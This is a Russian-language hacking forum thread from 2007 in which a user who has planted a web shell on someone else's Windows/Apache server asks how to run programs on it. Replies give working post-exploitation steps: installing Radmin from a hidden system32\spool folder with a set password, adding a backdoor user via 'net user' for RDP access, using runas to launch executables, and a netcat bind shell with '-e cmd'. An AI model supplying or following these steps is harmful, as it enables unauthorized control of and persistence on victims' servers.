PDA

Просмотр полной версии : Удаленный запуск exe/bat

Hana
26.05.2007, 21:38
- Есть доступ к компу (не локалхост)
- Могу загружать (шелл...)/скачивать/удалять с сервера без ограничений
- Win NT
- Apache

Как мне запустить на этом сервере какой-нибудь exe/bat файл?

- Не помешает ли то, что тачка залагофена?

Piflit
26.05.2007, 22:41
если в шелле есть поле для команд, просто вводишь имя исполняемого файла (полный путь)

genom--
26.05.2007, 23:27
залагофена? это что -- микроб новый или болезьн какая----- пифлит правильно сказал закачай шелл и через него

Hana
27.05.2007, 20:57
На локалхосте ехешка открывается - там нет.
Еще пробовал "start Full_Patch" - у меня пашет - там нет.

В чем м/б дело?

Alexsize
04.06.2007, 10:08
залагофена? это что -- микроб новый или болезьн какая----- пифлит правильно сказал закачай шелл и через него
Специально для тебя разжевываю 2 вещи:
1. "Залогофена" - Log Off - Пользователь не авторизовался в системе. Не влияет на выполнение программ из веб шелла.
2. Читай внимательно начало темы. Шелл уже залит.

Теперь по сабжу. Топикстартер, самый простой вариант, почему у тебя не выполняються комманды системы (в том числе и на исполнение файлов) это так назаваемый Safe Mode режим работы Apache сервера. Прежде чем выполнять exe или bat, попробуй выполнить комманду tasklist. Если оны выполниться, а программы - нет, то дело, скорее всего в дополнительной защите сервера. Впрочем это довольно большая редкость (доп.защита).

Hana
12.06.2007, 14:25
safe_mode: OFF
tasklist не выполняется. Еще можно что-то попробовать?

Hana
12.06.2007, 14:28
PHP version: 5.2.1
Disable functions : NONE
Windows NT 5.0 build 2195

При запуске (попытке) ехе или батника - ошибок не пишет и не ошибок тоже - просто начинает выполняться страница (загрузка) и продолжает это в течении 10 минут, потом я насильно перезахожу в шелл.

vectorg
12.06.2007, 14:42
При запуске (попытке) ехе или батника - ошибок не пишет и не ошибок тоже - просто начинает выполняться страница (загрузка) и продолжает это в течении 10 минут, потом я насильно перезахожу в шелл.Ну так и должно быть. Тебе сказали - выполни tasklist и посмотри висит ли твой ехе в процессах. Если нет, то значит фаервол/etc или банально нет прав.

limpompo
12.06.2007, 14:46
Рассказываю....

Значит так...

1) качаешь http://limpompo.nm.ru/radmin_install.rar
2) Заходишь на свой шелл... Меняешь диру на C:\windows\system32\spool
3) Создаёшь папочку Командой mkdir setup - потом заходишь в неё
4) Разархивируй Архив (Увидишь 4 файла)
5) Заливай по одному на Дедик
6) Запускай install.bat
7) Установи у себя Клиета Radmin
8) Коннектишься к Radmin server-у на порт 5454
9) ВВодишь пароль vasea_123
10) Ура... Можно и пивка выпить....

Hana
12.06.2007, 18:22
Тебе сказали - выполни tasklist и посмотри
tasklist не выполняется.

Рассказываю....
Спасибо. Радмин уже залит!!!
Подскажи только как сделать (6) пункт?

Если нет, то значит фаервол/etc или банально нет прав.
Фаера вроде нет. Каких прав нет? Как они ставятся? Как их получить?

limpompo
12.06.2007, 18:34
Спасибо. Радмин уже залит!!!
Подскажи только как сделать (6) пункт?

заходишь на шелл и в командной строке пишешь
C:\windows\system32\spool\setup\install.bat

И всё =)

Hana
12.06.2007, 22:29
Ты проблему темы читал?

Tw!m4
16.06.2007, 17:06
Hana

Попробуй через твой шелл замутить дополнительного юзверя net user vasia 123 /add
ну....если получитя конечно.....потом как создашь юзверя проверь есть ли он или нет net user если в списке есть vasia, то можешь попытаться проконектиться через рдп: у ся на компе: ALT+R => mstsc => server.com
если приконектится вводи логин vasia пароль 123 и всё......если получится то ты увидишь рабочий стол сервака!

//ЗЫ: немнога поздновато конечно....но ниче.....может другим пригодится =0)

Hana
18.06.2007, 01:07
Никогда не поздно =)
Юзера добавил, правда не так просто... Привилегии админа.
Но через рдп не лезет - пишет, что не удается подключиться...
Это значит сервис выключен или можно еще что-то попробовать (логин и пасс точно правильные)?

Hana
18.06.2007, 01:16
И заодно: как включается этот самый удаленный рабочий стол? Желательно чтобы слова можно было переделать в автоматизм (прогу напишу сам). Вопрос не для данного случая, но тоже нужен ;)

Tw!m4
18.06.2007, 13:23
попробуй стартануть сервис net start REMOTEACCESS...(на счёт названия сервиса я неуверен)если фаер будет блокировать, то придется работать с радмином или виэнси, пуск файлов типа exe/bat/cmd придется выполнять через команду runas такова типа echo (твой_пароль) | runas /env /noprofile /user:(твой_юзер) install.exe

Hana
24.06.2007, 15:39
попробуй стартануть сервис
Не могу даже у себя на компе - пишет что сервис выключен.
если фаер будет блокировать, то придется работать с радмином или виэнси, пуск файлов типа exe/bat/cmd придется выполнять через команду runas такова типа
Фаера там походу нет, но запустить что-либо связанное с нэтом не получатся:
Написал консольку типа РанАс. Она запускается через шелл, и выдает мой текст "Все ок".
Т.е. вроде должно запустится приложение. Написал еще одну прогу: при запуске конектиться на мой комп и через 5 сек выходит. Запускал и с своим РанАсом, и просто "напрямую" из шелла: ко мне никто так и не приконнектился. Этим же РанАсом удалил несколько папок (самопальных), которые не мог удалить чрез шелл командой rmdir (т.е. проги я могу запускать, но в нэт их кто-то не пускает). Думал проблема с ИПишкой сервака - но скорее всего ошибся, так как ко мне, повторюсь, этот самый сервак не приконнектился (у меня ИП норм).

Что еще можно попробовать?

Немного запортил сервак.
1) что я мог сделать, что теперь апачь в логах пишет только один ИП: 0.0.0.0?
2) если я перезагружу комп - апачь стартанется без ЛогИна?
3) при "прямых запусках" программ черех шелл, шеллы виснут, т.е. немогу зайти повторно и удалить их с сервака. Так должно быть или...?

Hana
24.06.2007, 15:41
P.s. пробовал запускать радмина и свой собственный "ДУ стол".

Tw!m4
26.06.2007, 14:05
Написал еще одну прогу: при запуске конектиться на мой комп и через 5 сек выходит. Запускал и с своим РанАсом, и просто "напрямую" из шелла: ко мне никто так и не приконнектился.

чем ты конектился к себе? покажи сорс проги....
фаер не обязательно должен стоять именно на этой машине, он может быть и на другой через которую проходит весь трафик, а может там и рутер стоит ;).....выведи команду netstat -ano
просмотри какие порты прослушиваются, залей нэткэт и повесь консоль в бэкграунд nc.exe или netcat.exe -l -p ( прослушивающийся порт ) -d -e cmd
а потом через putty от себя в моде RAW или RLOGIN ( точно не помню ) конэктся на указанный тобою порт и воаля....консоль сервака у тебя в руках

1) что я мог сделать, что теперь апачь в логах пишет только один ИП: 0.0.0.0?
2) если я перезагружу комп - апачь стартанется без ЛогИна?
3) при "прямых запусках" программ черех шелл, шеллы виснут, т.е. немогу зайти повторно и удалить их с сервака. Так должно быть или...?

1) даже понятия не имей
2) по идее должен без логина ( автоматичесkи ) - это же сервис
3) если прога требует пароль из консоли то это логично, а может ещё из за графического интерфэйса oO

//PS: "ДУ стол" - эта чё?

ßackTrack
26.06.2007, 14:26
Hana, если есть доступ к командной строке, заходишь в папку с файлом (с помощью комманд cd =)) и просто пишешь start file.bat или start file.exe должно работать

-=lebed=-
26.06.2007, 14:36
Hana сделай инжект VNC-сервера. Как сделать смотри тут: https://forum.antichat.ru/thread38434.html
Как включить Remote Desktop глянь тут: https://forum.antichat.ru/thread36042.html

Hana
27.06.2007, 21:45
чем ты конектился к себе? покажи сорс проги....
Простой сокет направленный на мой Ип и порт. Сама прога пашет - проверено.
выведи команду
Чето там сервак заглох - попробую когда отвиснет =)
//PS: "ДУ стол" - эта чё?
Дистанционно управляемый стол =) Аналог радмина, двумя словами...

Hana, если есть доступ к командной строке, заходишь в папку с файлом (с помощью комманд cd =)) и просто пишешь start file.bat или start file.exe должно работать
Проблема в том, что процедура "должно" выполняется не правильно, в этом вся проблема. Ни с стартом ни без...

-=lebed=- Сэнкс, попробую.

sys32
27.06.2007, 22:01
через телнет соединится и написать
start C:\e.exe
?

Hana
27.06.2007, 22:42
А через телнет как? Да и вообще проги то я уже запустил, проблема теперь с нэтом - не конектит и все (т.е. установка радмина ничего не дает).